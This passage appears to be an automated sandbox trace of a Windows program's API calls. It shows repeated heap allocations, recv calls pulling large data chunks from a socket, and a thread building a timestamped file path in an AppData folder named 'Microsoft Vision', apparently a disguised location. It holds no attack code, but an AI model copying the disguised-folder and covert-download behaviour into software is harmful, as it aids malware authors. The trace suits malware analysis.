dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.758] GetProcessHeap () returned 0x650000 [0314.758] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0314.758] GetProcessHeap () returned 0x650000 [0314.759] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db238 | out: hHeap=0x650000) returned 1 [0314.761] GetProcessHeap () returned 0x650000 [0314.761] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0314.762] GetProcessHeap () returned 0x650000 [0314.763] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0314.764] GetProcessHeap () returned 0x650000 [0314.765] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0314.766] GetProcessHeap () returned 0x650000 [0314.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x695630 [0314.768] GetProcessHeap () returned 0x650000 [0314.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67ff48 [0314.768] GetProcessHeap () returned 0x650000 [0314.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0314.771] GetProcessHeap () returned 0x650000 [0314.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0314.772] GetProcessHeap () returned 0x650000 [0314.773] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0314.773] GetProcessHeap () returned 0x650000 [0314.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0314.773] GetProcessHeap () returned 0x650000 [0314.774] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0314.774] GetProcessHeap () returned 0x650000 [0314.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0314.774] GetProcessHeap () returned 0x650000 [0314.774] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x707190 [0314.776] GetProcessHeap () returned 0x650000 [0314.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0314.778] GetProcessHeap () returned 0x650000 [0314.779] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0314.780] GetProcessHeap () returned 0x650000 [0314.781] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.781] GetProcessHeap () returned 0x650000 [0314.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0314.784] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0314.784] GetProcessHeap () returned 0x650000 [0314.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0314.784] GetProcessHeap () returned 0x650000 [0314.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0314.784] GetProcessHeap () returned 0x650000 [0314.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cd0 [0314.784] GetProcessHeap () returned 0x650000 [0314.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ce8 [0314.784] GetProcessHeap () returned 0x650000 [0314.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d00 [0314.785] GetProcessHeap () returned 0x650000 [0314.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0314.785] GetProcessHeap () returned 0x650000 [0314.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0314.785] GetProcessHeap () returned 0x650000 [0314.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0314.785] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 12960 [0314.785] recv (in: s=0x2c0, buf=0x2c82b0c, len=47056, flags=0 | out: buf=0x2c82b0c*) returned 47056 [0315.169] GetProcessHeap () returned 0x650000 [0315.169] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0315.169] GetProcessHeap () returned 0x650000 [0315.169] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0315.169] GetProcessHeap () returned 0x650000 [0315.169] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6cc7b0 [0315.170] GetProcessHeap () returned 0x650000 [0315.170] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6db238 [0315.171] GetProcessHeap () returned 0x650000 [0315.171] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0315.171] GetProcessHeap () returned 0x650000 [0315.171] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0315.173] GetProcessHeap () returned 0x650000 [0315.173] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0315.175] GetProcessHeap () returned 0x650000 [0315.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0315.176] GetProcessHeap () returned 0x650000 [0315.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0315.176] GetProcessHeap () returned 0x650000 [0315.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db238 | out: hHeap=0x650000) returned 1 [0315.178] GetProcessHeap () returned 0x650000 [0315.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0315.179] GetProcessHeap () returned 0x650000 [0315.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.180] GetProcessHeap () returned 0x650000 [0315.181] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0315.182] GetProcessHeap () returned 0x650000 [0315.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x695630 [0315.184] GetProcessHeap () returned 0x650000 [0315.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67ffc8 [0315.184] GetProcessHeap () returned 0x650000 [0315.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0315.185] GetProcessHeap () returned 0x650000 [0315.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0315.186] GetProcessHeap () returned 0x650000 [0315.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.187] GetProcessHeap () returned 0x650000 [0315.187] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0315.188] GetProcessHeap () returned 0x650000 [0315.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0315.190] GetProcessHeap () returned 0x650000 [0315.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0315.191] GetProcessHeap () returned 0x650000 [0315.191] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x707190, Size=0x1d4c0) returned 0x715bf8 [0315.194] GetProcessHeap () returned 0x650000 [0315.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0315.194] GetProcessHeap () returned 0x650000 [0315.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.196] GetProcessHeap () returned 0x650000 [0315.197] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0315.198] GetProcessHeap () returned 0x650000 [0315.199] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0315.201] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cd0 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678d30 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d18 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d18 | out: hHeap=0x650000) returned 1 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d30 | out: hHeap=0x650000) returned 1 [0315.201] GetProcessHeap () returned 0x650000 [0315.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0315.201] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 12792 [0315.201] recv (in: s=0x2c0, buf=0x2c82a64, len=47224, flags=0 | out: buf=0x2c82a64*) returned 47224 [0315.625] GetProcessHeap () returned 0x650000 [0315.625] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0315.625] GetProcessHeap () returned 0x650000 [0315.625] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0315.625] GetProcessHeap () returned 0x650000 [0315.625] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6cc7b0 [0315.627] GetProcessHeap () returned 0x650000 [0315.627] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6db238 [0315.628] GetProcessHeap () returned 0x650000 [0315.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0315.628] GetProcessHeap () returned 0x650000 [0315.628] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0315.629] GetProcessHeap () returned 0x650000 [0315.629] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0315.630] GetProcessHeap () returned 0x650000 [0315.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0315.631] GetProcessHeap () returned 0x650000 [0315.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0315.631] GetProcessHeap () returned 0x650000 [0315.631] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db238 | out: hHeap=0x650000) returned 1 [0315.633] GetProcessHeap () returned 0x650000 [0315.633] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0315.634] GetProcessHeap () returned 0x650000 [0315.635] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.636] GetProcessHeap () returned 0x650000 [0315.636] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0315.637] GetProcessHeap () returned 0x650000 [0315.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x695630 [0315.638] GetProcessHeap () returned 0x650000 [0315.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67fee8 [0315.638] GetProcessHeap () returned 0x650000 [0315.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x707190 [0315.639] GetProcessHeap () returned 0x650000 [0315.639] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0315.641] GetProcessHeap () returned 0x650000 [0315.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x707190 | out: hHeap=0x650000) returned 1 [0315.642] GetProcessHeap () returned 0x650000 [0315.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x707190 [0315.642] GetProcessHeap () returned 0x650000 [0315.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.642] GetProcessHeap () returned 0x650000 [0315.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0315.642] GetProcessHeap () returned 0x650000 [0315.642] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x715bf8, Size=0x2bf20) returned 0x48a0048 [0315.647] GetProcessHeap () returned 0x650000 [0315.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0315.650] GetProcessHeap () returned 0x650000 [0315.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x707190 | out: hHeap=0x650000) returned 1 [0315.652] GetProcessHeap () returned 0x650000 [0315.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0315.653] GetProcessHeap () returned 0x650000 [0315.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0315.654] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0315.809] GetProcessHeap () returned 0x650000 [0315.810] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cd0 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ce8 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d00 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0315.810] GetProcessHeap () returned 0x650000 [0315.810] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0315.810] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 23348 [0315.810] recv (in: s=0x2c0, buf=0x2c853a0, len=36668, flags=0 | out: buf=0x2c853a0*) returned 36668 [0316.063] GetProcessHeap () returned 0x650000 [0316.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0316.063] GetProcessHeap () returned 0x650000 [0316.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0316.063] GetProcessHeap () returned 0x650000 [0316.063] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6cc7b0 [0316.064] GetProcessHeap () returned 0x650000 [0316.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6db238 [0316.065] GetProcessHeap () returned 0x650000 [0316.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0316.065] GetProcessHeap () returned 0x650000 [0316.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0316.066] GetProcessHeap () returned 0x650000 [0316.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0316.067] GetProcessHeap () returned 0x650000 [0316.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0316.069] GetProcessHeap () returned 0x650000 [0316.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0316.069] GetProcessHeap () returned 0x650000 [0316.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db238 | out: hHeap=0x650000) returned 1 [0316.070] GetProcessHeap () returned 0x650000 [0316.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0316.071] GetProcessHeap () returned 0x650000 [0316.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.072] GetProcessHeap () returned 0x650000 [0316.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0316.073] GetProcessHeap () returned 0x650000 [0316.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x695630 [0316.075] GetProcessHeap () returned 0x650000 [0316.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x680148 [0316.075] GetProcessHeap () returned 0x650000 [0316.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0316.076] GetProcessHeap () returned 0x650000 [0316.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0316.077] GetProcessHeap () returned 0x650000 [0316.077] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.078] GetProcessHeap () returned 0x650000 [0316.078] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0316.079] GetProcessHeap () returned 0x650000 [0316.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0316.081] GetProcessHeap () returned 0x650000 [0316.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0316.082] GetProcessHeap () returned 0x650000 [0316.082] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x48a0048, Size=0x3a980) returned 0x48cbf70 [0316.086] GetProcessHeap () returned 0x650000 [0316.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0316.087] GetProcessHeap () returned 0x650000 [0316.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.089] GetProcessHeap () returned 0x650000 [0316.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0316.090] GetProcessHeap () returned 0x650000 [0316.090] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0316.092] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d30 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cb8 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cd0 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d18 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0316.092] GetProcessHeap () returned 0x650000 [0316.092] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0316.092] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 11500 [0316.092] recv (in: s=0x2c0, buf=0x2c82558, len=48516, flags=0 | out: buf=0x2c82558*) returned 48516 [0316.320] GetProcessHeap () returned 0x650000 [0316.320] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d18 | out: hHeap=0x650000) returned 1 [0316.320] GetProcessHeap () returned 0x650000 [0316.320] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d30 | out: hHeap=0x650000) returned 1 [0316.320] GetProcessHeap () returned 0x650000 [0316.321] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6cc7b0 [0316.322] GetProcessHeap () returned 0x650000 [0316.322] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6db238 [0316.323] GetProcessHeap () returned 0x650000 [0316.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0316.323] GetProcessHeap () returned 0x650000 [0316.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0316.325] GetProcessHeap () returned 0x650000 [0316.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0316.325] GetProcessHeap () returned 0x650000 [0316.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0316.327] GetProcessHeap () returned 0x650000 [0316.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0316.327] GetProcessHeap () returned 0x650000 [0316.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db238 | out: hHeap=0x650000) returned 1 [0316.333] GetProcessHeap () returned 0x650000 [0316.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0316.337] GetProcessHeap () returned 0x650000 [0316.337] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.340] GetProcessHeap () returned 0x650000 [0316.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0316.342] GetProcessHeap () returned 0x650000 [0316.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x695630 [0316.343] GetProcessHeap () returned 0x650000 [0316.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67ff88 [0316.343] GetProcessHeap () returned 0x650000 [0316.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0316.344] GetProcessHeap () returned 0x650000 [0316.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0316.345] GetProcessHeap () returned 0x650000 [0316.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.346] GetProcessHeap () returned 0x650000 [0316.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cc7b0 [0316.346] GetProcessHeap () returned 0x650000 [0316.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0316.347] GetProcessHeap () returned 0x650000 [0316.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6db218 [0316.347] GetProcessHeap () returned 0x650000 [0316.347] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x48cbf70, Size=0x3defd) returned 0x49068f8 [0316.352] SetEvent (hEvent=0x25c) returned 1 [0316.352] GetProcessHeap () returned 0x650000 [0316.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6db218 | out: hHeap=0x650000) returned 1 [0316.352] GetProcessHeap () returned 0x650000 [0316.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0316.356] GetProcessHeap () returned 0x650000 [0316.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0316.357] GetProcessHeap () returned 0x650000 [0316.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0316.358] recv (s=0x2c0, buf=0x2c7f860, len=12, flags=0) Thread: id = 90 os_tid = 0xca8 Thread: id = 184 os_tid = 0xc94 Thread: id = 185 os_tid = 0xc8c Thread: id = 186 os_tid = 0x310 [0304.543] CRpcThreadCache::RpcWorkerThreadEntry () Thread: id = 194 os_tid = 0xdc8 [0311.187] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0311.187] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2b3d0f8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0311.187] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0311.187] GetLocalTime (in: lpSystemTime=0x41efeb4 | out: lpSystemTime=0x41efeb4*(wYear=0x7e6, wMonth=0x5, wDayOfWeek=0x0, wDay=0x16, wHour=0xd, wMinute=0x1b, wSecond=0x2, wMilliseconds=0xd)) [0311.187] wsprintfW (in: param_1=0x41efee0, param_2="%02d-%02d-%02d_%02d.%02d.%02d" | out: param_1="22-05-2022_13.27.02") returned 19 [0311.187] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\", lpString2="22-05-2022_13.27.02" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02" [0311.187] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned 72 [0311.187] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0311.285] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned 72 [0311.285] lstrcpyW (in: lpString1=0x3760000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02" [0311.285] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\22-05-2022_13.27.02") returned 72 [0311.285] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0311.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft 